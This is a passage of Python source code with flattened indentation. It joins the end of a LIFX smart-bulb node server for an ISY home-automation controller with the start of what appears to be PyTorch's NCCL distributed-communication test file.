self.device.set_color(self.color, self.duration, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb {}. This happens from time to time, normally safe to ignore. {}'.format(self.name, _cmd, str(ex)))
LOGGER.info('Received manual change, updating the bulb to: {} duration: {}'.format(str(self.color), self.duration))
if driver:
self.setDriver(driver[0], driver[1])
self._power_on_change()
else: LOGGER.info('Received manual change, however the bulb is in a disconnected state... ignoring')
def setHSBKD(self, command):
query = command.get('query')
try:
self.color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')), int(query.get('K.uom26'))]
self.duration = int(query.get('D.uom42'))
LOGGER.info('Received manual change, updating the bulb to: {} duration: {}'.format(str(self.color), self.duration))
except TypeError:
self.duration = 0
try:
self.device.set_color(self.color, duration=self.duration, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, self.color[ind])
self._power_on_change()
self.setDriver('RR', self.duration)
def set_ir_brightness(self, command):
_val = int(command.get('value'))
if not self.device.supports_infrared():
LOGGER.error('{} is not IR capable'.format(self.name))
return
try:
self.device.set_infrared(_val)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb IR Brightness. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.setDriver('GV7', _val)
def set_wf(self, command):
WAVEFORM = ['Saw', 'Sine', 'HalfSine', 'Triangle', 'Pulse']
if self.power is False:
LOGGER.error('{} can not run Waveform as it is currently off'.format(self.name))
return
query = command.get('query')
wf_color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')), int(query.get('K.uom26'))]
wf_period = int(query.get('PE.uom42'))
wf_cycles = int(query.get('CY.uom56'))
wf_duty_cycle = int(query.get('DC.uom56'))
wf_form = int(query.get('WF.uom25'))
if wf_form >= 5:
wf_transient = 1
wf_form -= 5
else:
wf_transient = 0
LOGGER.debug('Color tuple: {}, Period: {}, Cycles: {}, Duty cycle: {}, Form: {}, Transient: {}'.format(wf_color, wf_period, wf_cycles, wf_duty_cycle, WAVEFORM[wf_form], wf_transient))
try:
self.device.set_waveform(wf_transient, wf_color, wf_period, wf_cycles, wf_duty_cycle, wf_form)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb Waveform. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
drivers = [{'driver': 'ST', 'value': 0, 'uom': 51},
{'driver': 'GV0', 'value': 0, 'uom': 56},
{'driver': 'GV1', 'value': 0, 'uom': 56},
{'driver': 'GV2', 'value': 0, 'uom': 56},
{'driver': 'GV3', 'value': 0, 'uom': 56},
{'driver': 'CLITEMP', 'value': 0, 'uom': 26},
{'driver': 'GV5', 'value': 0, 'uom': 2},
{'driver': 'GV6', 'value': 0, 'uom': 20},
{'driver': 'GV7', 'value': 0, 'uom': 56},
{'driver': 'RR', 'value': 0, 'uom': 42}]
id = 'lifxcolor'
commands = {
'DON': setOn, 'DOF': setOff, 'QUERY': query,
'SET_COLOR': setColor, 'SETH': setManual,
'SETS': setManual, 'SETB': setManual,
'CLITEMP': setManual,
'RR': setManual, 'SET_HSBKD': setHSBKD,
'BRT': brighten, 'DIM': dim, 'FDUP': fade_up,
'FDDOWN': fade_down, 'FDSTOP': fade_stop,
'DFON': setOn, 'DFOF': setOff,
'SETIR': set_ir_brightness, 'WAVEFORM': set_wf
}
class MultiZone(Light):
def __init__(self, controller, primary, address, name, dev):
super().__init__(controller, primary, address, name, dev)
self.num_zones = 0
self.current_zone = 0
self.new_color = None
self.pending = False
def update(self):
connected = 0
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
if not self.pending:
try:
self.color = self.device.get_color_zones()
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} multizone color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
self.num_zones = len(self.color)
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
try:
self.setDriver(driver, self.color[zone][ind])
except (TypeError) as e:
LOGGER.debug('setDriver for color caught an error. color was : {}'.format(self.color or None))
self.setDriver('GV4', self.current_zone)
try:
power_now = True if self.device.get_power() == 65535 else False
if self.power != power_now:
if power_now:
self.reportCmd('DON')
else:
self.reportCmd('DOF')
self.power = power_now
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} multizone power. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
connected = 1
self._set_st()
self.connected = connected
self.setDriver('GV5', self.connected)
self.setDriver('RR', self.duration)
self.lastupdate = time.time()
def _set_st(self):
if self.num_zones == 0: return
if self.power:
avg_brightness = 0
for z in self.color:
avg_brightness += z[2]
avg_brightness /= self.num_zones
self.setDriver('ST', self._bri_to_percent(avg_brightness))
else:
self.setDriver('ST', 0)
def start(self):
try:
self.duration = int(self.getDriver('RR'))
except:
self.duration = 0
try:
self.current_zone = int(self.getDriver('GV4'))
except:
self.current_zone = 0
self.update()
self.long_update()
def setOn(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
cmd = command.get('cmd')
val = command.get('value')
new_bri = None
if cmd == 'DFON' and self.color[zone][2] != BR_MAX:
new_bri = BR_MAX
trans = 0
elif cmd == 'DON' and val is not None:
new_bri = int(round(int(val)*65535/255))
if new_bri > BR_MAX:
new_bri = BR_MAX
elif new_bri < BR_MIN:
new_bri = BR_MIN
trans = self.duration
elif self.power and self.color[zone][2] != BR_MAX:
new_bri = BR_MAX
trans = self.duration
if new_bri is not None:
new_color = list(self.color[zone])
new_color[2] = new_bri
try:
if self.current_zone == 0:
self.device.set_color(new_color, trans, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, trans, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error DON {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.setDriver('GV3', new_color[2])
try:
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = True
self._set_st()
def dim(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
if self.power is False:
LOGGER.info('{} is off, ignoring DIM'.format(self.name))
new_bri = self.color[zone][2] - BR_INCREMENT
if new_bri < BR_MIN:
new_bri = BR_MIN
new_color = list(self.color[zone])
new_color[2] = new_bri
try:
if self.current_zone == 0:
self.device.set_color(new_color, BRTDIM_INTERVAL, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, BRTDIM_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on dimming {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self._set_st()
self.setDriver('GV3', new_color[2])
def brighten(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
new_color = list(self.color[zone])
if self.power is False:
# Bulb is currently off, let's turn it on ~2%
new_color[2] = BR_MIN
try:
if self.current_zone == 0:
self.device.set_color(new_color, 0, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, 0, rapid=False)
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on brightnening {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = True
self._set_st()
return
new_bri = self.color[zone][2] + BR_INCREMENT
if new_bri > BR_MAX:
new_bri = BR_MAX
new_color[2] = new_bri
try:
if self.current_zone == 0:
self.device.set_color(new_color, BRTDIM_INTERVAL, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, BRTDIM_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on dimming {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self._set_st()
self.setDriver('GV3', new_color[2])
def fade_up(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
new_color = list(self.color[zone])
if self.power is False:
# Bulb is currently off, let's turn it on ~2%
new_color[2] = BR_MIN
try:
if self.current_zone == 0:
self.device.set_color(new_color, 0, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, 0, rapid=False)
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on brightnening {} bulb. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
self.power = True
self._set_st()
if self.color[zone][2] == BR_MAX:
LOGGER.info('{} Can not FadeUp, already at maximum'.format(self.name))
return
new_color[2] = BR_MAX
try:
if self.current_zone == 0:
self.device.set_color(new_color, FADE_INTERVAL, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, FADE_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error {} bulb Fade Up. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
def fade_down(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
new_color = list(self.color[zone])
if self.power is False:
LOGGER.error('{} can not FadeDown as it is currently off'.format(self.name))
return
if self.color[zone][2] <= BR_MIN:
LOGGER.error('{} can not FadeDown as it is currently at minimum'.format(self.name))
return
new_color[2] = BR_MIN
try:
if self.current_zone == 0:
self.device.set_color(new_color, FADE_INTERVAL, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, FADE_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error {} bulb Fade Down. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
def fade_stop(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
if self.power is False:
LOGGER.error('{} can not FadeStop as it is currently off'.format(self.name))
return
# check current brightness level
try:
self.color = self.device.get_color_zones()
except (lifxlan.WorkflowException, OSError) as ex:
LOGGER.error('Connection Error on getting {} multizone color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
else:
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, self.color[zone][ind])
if self.color[zone][2] == BR_MIN or self.color[zone][2] == BR_MAX:
LOGGER.error('{} can not FadeStop as it is currently at limit'.format(self.name))
return
try:
if self.current_zone == 0:
self.device.set_color(self.color[zone], 0, rapid=False)
else:
self.device.set_zone_color(zone, zone, self.color[zone], 0, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error {} bulb Fade Stop. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
def apply(self, command):
try:
if self.new_color:
self.color = deepcopy(self.new_color)
self.new_color = None
self.device.set_zone_colors(self.color, self.duration, rapid=True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('Connection Error on setting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
LOGGER.info('Received apply command for {}'.format(self.address))
self.pending = False
def setColor(self, command):
if self.connected:
try:
_color = int(command.get('value'))
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
if self.current_zone == 0:
self.device.set_color(COLORS[_color][1], self.duration, True)
else:
self.device.set_zone_color(zone, zone, COLORS[_color][1], self.duration, True)
LOGGER.info('Received SetColor command from ISY. Changing {} color to: {}'.format(self.address, COLORS[_color][0]))
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('mz setcolor error {}'.format(str(ex)))
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, COLORS[_color][1][ind])
else: LOGGER.info('Received SetColor, however the bulb is in a disconnected state... ignoring')
def setManual(self, command):
if self.connected:
_cmd = command.get('cmd')
_val = int(command.get('value'))
try:
if _cmd == 'SETZ':
self.current_zone = int(_val)
if self.current_zone > self.num_zones: self.current_zone = 0
driver = ['GV4', self.current_zone]
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
new_color = list(self.color[zone])
if _cmd == 'SETH':
new_color[0] = int(_val)
driver = ['GV1', new_color[0]]
elif _cmd == 'SETS':
new_color[1] = int(_val)
driver = ['GV2', new_color[1]]
elif _cmd == 'SETB':
new_color[2] = int(_val)
driver = ['GV3', new_color[2]]
elif _cmd == 'CLITEMP':
new_color[3] = int(_val)
driver = ['CLITEMP', new_color[3]]
elif _cmd == 'RR':
self.duration = _val
driver = ['RR', self.duration]
self.color[zone] = new_color
if self.current_zone == 0:
self.device.set_color(new_color, self.duration, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, self.duration, rapid=False)
except (lifxlan.WorkflowException, TypeError) as ex:
LOGGER.error('setmanual mz error {}'.format(ex))
LOGGER.info('Received manual change, updating the mz bulb zone {} to: {} duration: {}'.format(zone, new_color, self.duration))
if driver:
self.setDriver(driver[0], driver[1])
else: LOGGER.info('Received manual change, however the mz bulb is in a disconnected state... ignoring')
def setHSBKDZ(self, command):
query = command.get('query')
if not self.pending:
self.new_color = deepcopy(self.color)
self.pending = True
current_zone = int(query.get('Z.uom56'))
zone = deepcopy(current_zone)
if current_zone != 0: zone -= 1
self.new_color[zone] = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')), int(query.get('K.uom26'))]
try:
self.duration = int(query.get('D.uom42'))
except TypeError:
self.duration = 0
try:
if current_zone == 0:
self.device.set_color(self.new_color, self.duration, rapid=False)
else:
self.device.set_zone_color(zone, zone, self.new_color, self.duration, rapid=False, apply = 0)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('set mz hsbkdz error %s', str(ex))
commands = {
'DON': setOn, 'DOF': Light.setOff,
'APPLY': apply, 'QUERY': Light.query,
'SET_COLOR': setColor, 'SETH': setManual,
'SETS': setManual, 'SETB': setManual,
'CLITEMP': setManual, 'RR': setManual,
'SETZ': setManual, 'SET_HSBKDZ': setHSBKDZ,
'BRT': brighten, 'DIM': dim,
'FDUP': fade_up, 'FDDOWN': fade_down,
'FDSTOP': fade_stop, 'DFON': setOn,
'DFOF': Light.setOff, 'SETIR': Light.set_ir_brightness,
'WAVEFORM': Light.set_wf
}
drivers = [{'driver': 'ST', 'value': 0, 'uom': 51},
{'driver': 'GV0', 'value': 0, 'uom': 56},
{'driver': 'GV1', 'value': 0, 'uom': 56},
{'driver': 'GV2', 'value': 0, 'uom': 56},
{'driver': 'GV3', 'value': 0, 'uom': 56},
{'driver': 'CLITEMP', 'value': 0, 'uom': 26},
{'driver': 'GV4', 'value': 0, 'uom': 56},
{'driver': 'GV5', 'value': 0, 'uom': 2},
{'driver': 'GV6', 'value': 0, 'uom': 20},
{'driver': 'GV7', 'value': 0, 'uom': 56},
{'driver': 'RR', 'value': 0, 'uom': 42}]
id = 'lifxmultizone'
class Group(polyinterface.Node):
"""
LiFX Group Node Class
"""
def __init__(self, controller, primary, address, label, grp=None):
self.label = label.replace("'", "")
super().__init__(controller, primary, address, 'LIFX Group ' + str(label))
self.lifxLabel = label
if grp:
self.lifxGroup = grp
else:
self.lifxGroup = self.controller.lifxLan.get_devices_by_group(label)
self.numMembers = len(self.lifxGroup.devices)
def start(self):
self.update()
#self.reportDrivers()
def update(self):
self.numMembers = len(self.lifxGroup.devices)
self.setDriver('ST', self.numMembers)
def long_update(self):
pass
def query(self, command = None):
self.update()
self.reportDrivers()
def _power_on_change(self):
if not self.controller.change_pon:
return
try:
self.lifxGroup.set_power(True,rapid=True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Error on setting {} power. This happens from time to time, normally safe to ignore. {}'.format(self.name, str(ex)))
def setOn(self, command):
try:
self.lifxGroup.set_power(True, rapid = True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group seton error caught %s', str(ex))
else:
LOGGER.info('Received SetOn command for group {} from ISY. Setting all {} members to ON.'.format(self.label, self.numMembers))
def setOff(self, command):
try:
self.lifxGroup.set_power(False, rapid = True)
except (lifxlan.WorkflowException, IOError) as e:
LOGGER.error('group setoff error caught {}'.format(str(e)))
else:
LOGGER.info('Received SetOff command for group {} from ISY. Setting all {} members to OFF.'.format(self.label, self.numMembers))
def setColor(self, command):
_color = int(command.get('value'))
try:
self.lifxGroup.set_color(COLORS[_color][1], 0, rapid = True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group setcolor error caught %s', str(ex))
else:
LOGGER.info('Received SetColor command for group {} from ISY. Changing color to: {} for all {} members.'.format(self.name, COLORS[_color][0], self.numMembers))
self._power_on_change()
def setHue(self, command):
_hue = int(command.get('value'))
try:
self.lifxGroup.set_hue(_hue, 0, rapid = True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group sethue error caught %s', str(ex))
else:
LOGGER.info('Received SetHue command for group {} from ISY. Changing hue to: {} for all {} members.'.format(self.name, _hue, self.numMembers))
self._power_on_change()
def setSat(self, command):
_sat = int(command.get('value'))
try:
self.lifxGroup.set_saturation(_sat, 0, rapid = True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group setsaturation error caught %s', str(ex))
else:
LOGGER.info('Received SetSat command for group {} from ISY. Changing saturation to: {} for all {} members.'.format(self.name, _sat, self.numMembers))
self._power_on_change()
def setBri(self, command):
_bri = int(command.get('value'))
try:
self.lifxGroup.set_brightness(_bri, 0, rapid = True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group setbrightness error caught %s', str(ex))
else:
LOGGER.info('Received SetBri command for group {} from ISY. Changing brightness to: {} for all {} members.'.format(self.name, _bri, self.numMembers))
self._power_on_change()
def setCTemp(self, command):
_ctemp = int(command.get('value'))
try:
self.lifxGroup.set_colortemp(_ctemp, 0, rapid = True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group setcolortemp error caught %s', str(ex))
else:
LOGGER.info('Received SetCTemp command for group {} from ISY. Changing color temperature to: {} for all {} members.'.format(self.name, _ctemp, self.numMembers))
self._power_on_change()
def set_ir_brightness(self, command):
_val = int(command.get('value'))
try:
self.lifxGroup.set_infrared(_val)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group set_infrared_brightness error caught %s', str(ex))
else:
LOGGER.info('Received SetIR command for group {} from ISY. Changing infrared brightness to: {} for all {} members.'.format(self.name, _val, self.numMembers))
self._power_on_change()
def setHSBKD(self, command):
query = command.get('query')
try:
color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')), int(query.get('K.uom26'))]
duration = int(query.get('D.uom42'))
except TypeError:
duration = 0
try:
self.lifxGroup.set_color(color, duration = duration, rapid = True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group sethsbkd error caught {}'.format(str(ex)))
else:
LOGGER.info('Recieved SetHSBKD command for group {} from ISY, Setting all members to Color {}, duration {}'.format(self.label, color, duration))
self._power_on_change()
drivers = [{'driver': 'ST', 'value': 0, 'uom': 56}]
commands = {
'DON': setOn, 'DOF': setOff, 'QUERY': query,
'SET_COLOR': setColor, 'SET_HSBKD': setHSBKD,
'SETH': setHue, 'SETS': setSat, 'SETB': setBri,
'CLITEMP': setCTemp, 'DFON': setOn, 'DFOF': setOff,
'SETIR': set_ir_brightness
}
id = 'lifxgroup'
if __name__ == "__main__":
try:
polyglot = polyinterface.Interface('LiFX')
polyglot.start()
control = Controller(polyglot)
control.runForever()
except (KeyboardInterrupt, SystemExit):
sys.exit(0)
|
test_c10d_nccl.py
|
import copy
import math
import os
import random
import signal
import sys
import tempfile
import threading
import time
from contextlib import contextmanager
from datetime import timedelta
from itertools import product
from unittest import mock
import torch
import torch.distributed as c10d
if not c10d.is_available():
print("c10d not available, skipping tests", file=sys.stderr)
sys.exit(0)
import test_c10d_common
import torch.distributed as dist
import torch.distributed.algorithms.ddp_comm_hooks.default_hooks as default
import torch.distributed.algorithms.ddp_comm_hooks.powerSGD_hook as powerSGD
import torch.nn.functional as F
import torch.testing._internal.common_utils as common
from test_c10d_common import gpus_for_rank, DoubleGpuNet, ConvNet, ModuleForDdpCommHook
from torch import nn
from torch.nn.parallel import DistributedDataParallel
from torch.testing._internal.common_distributed import (
MultiProcessTestCase,
requires_nccl,
requires_nccl_version,
skip_if_lt_x_gpu,
get_timeout,
skip_if_rocm,
with_dist_debug_levels,
with_nccl_blocking_wait,
)
from torch.testing._internal.common_utils import (
IS_WINDOWS,
TestCase,
run_tests,
retry_on_connect_failures,
TEST_WITH_DEV_DBG_ASAN,
TEST_WITH_TSAN,
sandcastle_skip,
sandcastle_skip_if,
)
from torch.utils.checkpoint import checkpoint
from torch.distributed.optim import functional_optim_map
if not IS_WINDOWS:
from torch.distributed.optim.functional_sgd import _FunctionalSGD
from torch.distributed.optim.functional_adam import _FunctionalAdam
from torch.distributed.optim.functional_adamw import _FunctionalAdamW
if TEST_WITH_TSAN:
print(
"Skip as TSAN is not fork-safe since we're forking in a multi-threaded environment",
file=sys.stderr,
)
sys.exit(0)
if TEST_WITH_DEV_DBG_ASAN:
print(
"Skip ASAN as torch + multiprocessing spawn have known issues", file=sys.stderr
)
sys.exit(0)
class RendezvousEnvTest(TestCase):
@retry_on_connect_failures
@requires_nccl()
@sandcastle_skip_if(
torch.cuda.device_count() == 0, "No GPUs available, skipping test"
)
def test_common_errors(self):
vars = {
"WORLD_SIZE": "1",
"RANK": "0",
"MASTER_ADDR": "127.0.0.1",
"MASTER_PORT": str(common.find_free_port()),
}
class Env(object):
def __init__(self, vars):
self.env_patcher = mock.patch.dict(os.environ, vars, clear=True)
def __enter__(self):
self.env_patcher.start()
def __exit__(self, type, value, traceback):
self.env_patcher.stop()
def without(d, key):
d = d.copy()
d.pop(key)
return d
def withouts(d, keys):
d = d.copy()
for key in keys:
d.pop(key)
return d
with Env(without(vars, "WORLD_SIZE")):
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
with self.assertRaisesRegex(ValueError, "WORLD_SIZE expected"):
gen = c10d.rendezvous("env://")
next(gen)
c10d.init_process_group(backend="nccl", world_size=1)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(without(vars, "RANK")):
self.assertEqual(None, os.environ.get("RANK"))
with self.assertRaisesRegex(ValueError, "RANK expected"):
gen = c10d.rendezvous("env://")
next(gen)
c10d.init_process_group(backend="nccl", rank=0)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(withouts(vars, ["RANK", "WORLD_SIZE"])):
self.assertEqual(None, os.environ.get("RANK"))
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
c10d.init_process_group(backend="nccl", rank=0, world_size=1)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(vars):
c10d.init_process_group(backend="nccl")
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(without(vars, "MASTER_ADDR")):
self.assertEqual(None, os.environ.get("MASTER_ADDR"))
with self.assertRaisesRegex(ValueError, "MASTER_ADDR expected"):
gen = c10d.rendezvous("env://")
next(gen)
with Env(without(vars, "MASTER_PORT")):
self.assertEqual(None, os.environ.get("MASTER_PORT"))
with self.assertRaisesRegex(ValueError, "MASTER_PORT expected"):
gen = c10d.rendezvous("env://")
next(gen)
with Env(without(vars, "WORLD_SIZE")):
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
gen = c10d.rendezvous("env://?world_size={}".format(1))
_, _, size = next(gen)
self.assertEqual(size, 1)
with Env(without(vars, "RANK")):
self.assertEqual(None, os.environ.get("RANK"))
gen = c10d.rendezvous("env://?rank={}".format(0))
_, rank, _ = next(gen)
self.assertEqual(rank, 0)
with Env(withouts(vars, ["RANK", "WORLD_SIZE"])):
self.assertEqual(None, os.environ.get("RANK"))
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
gen = c10d.rendezvous("env://?rank={}&world_size={}".format(0, 1))
_, rank, size = next(gen)
self.assertEqual(rank, 0)
self.assertEqual(size, 1)
class TimeoutTest(test_c10d_common.AbstractTimeoutTest, TestCase):
@requires_nccl()
@retry_on_connect_failures
@sandcastle_skip_if(
torch.cuda.device_count() == 0, "No GPUs available, skipping test"
)
def test_default_store_timeout_nccl(self):
self._test_default_store_timeout("nccl")
class ProcessGroupNCCLNoGPUTest(TestCase):
MAIN_PROCESS_RANK = 0
def setUp(self):
self.rank = self.MAIN_PROCESS_RANK
self.world_size = 1
self.file = tempfile.NamedTemporaryFile(delete=False)
def tearDown(self):
pass
@requires_nccl()
@sandcastle_skip_if(
torch.cuda.device_count() > 0, "GPUs are available, skipping test"
)
def test_init_no_gpus(self):
store = c10d.FileStore(self.file.name, self.world_size)
with self.assertRaisesRegex(
RuntimeError, "ProcessGroupNCCL is only supported with GPUs, no GPUs found!"
):
c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class ProcessGroupNCCLTest(TestCase):
MAIN_PROCESS_RANK = 0
def setUp(self):
self.rank = self.MAIN_PROCESS_RANK
self.world_size = 1
self.file = tempfile.NamedTemporaryFile(delete=False)
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self.num_gpus = torch.cuda.device_count()
def tearDown(self):
pass
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_empty_tensors(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
xs = [torch.cuda.FloatTensor([])]
pg.broadcast(xs).wait()
self.assertEqual(0, xs[0].numel())
pg.allreduce(xs).wait()
self.assertEqual(0, xs[0].numel())
pg.reduce(xs).wait()
self.assertEqual(0, xs[0].numel())
ys = [[torch.cuda.FloatTensor([]) for _ in range(self.world_size)]]
pg.allgather(ys, xs).wait()
for y in ys[0]:
self.assertEqual(0, y.numel())
ys = [torch.cuda.FloatTensor([])]
xs = [[torch.cuda.FloatTensor([]) for _ in range(self.world_size)]]
pg.reduce_scatter(ys, xs).wait()
self.assertEqual(0, ys[0].numel())
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_broadcast_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def broadcast(xs, rootRank, rootTensor):
opts = c10d.BroadcastOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
work = pg.broadcast(xs, opts)
work.wait()
# for every root tensor
for rt in range(self.num_gpus):
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i]).cuda(i))
broadcast(tensors, self.rank, rt)
for i in range(self.num_gpus):
self.assertEqual(tensors[i], tensors[rt])
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allreduce_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce(tensors, op):
opts = c10d.AllreduceOptions()
opts.reduceOp = op
work = pg.allreduce(tensors, opts)
work.wait()
# Sum
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.SUM)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(self.num_gpus * (self.num_gpus + 1) / 2)]),
tensors[i],
)
# Product
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.PRODUCT)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(math.factorial(self.num_gpus))]), tensors[i]
)
# Min
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.MIN)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(torch.tensor([1.0]), tensors[i])
# Max
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.MAX)
for i in range(self.num_gpus):
self.assertEqual(torch.tensor([self.num_gpus]), tensors[i])
for op in (c10d.ReduceOp.BAND, c10d.ReduceOp.BOR, c10d.ReduceOp.BXOR):
with self.assertRaisesRegex(
RuntimeError, "Cannot use " + str(op) + " with NCCL"
):
allreduce(tensors, op)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce(xs, rootRank, rootTensor, op=None):
opts = c10d.ReduceOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
if op:
opts.reduceOp = op
work = pg.reduce(xs, opts)
work.wait()
# for every root tensor
for rt in range(self.num_gpus):
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
reduce(tensors, self.rank, rt)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(self.num_gpus * (self.num_gpus + 1) / 2)]),
tensors[rt],
)
for op in (c10d.ReduceOp.BAND, c10d.ReduceOp.BOR, c10d.ReduceOp.BXOR):
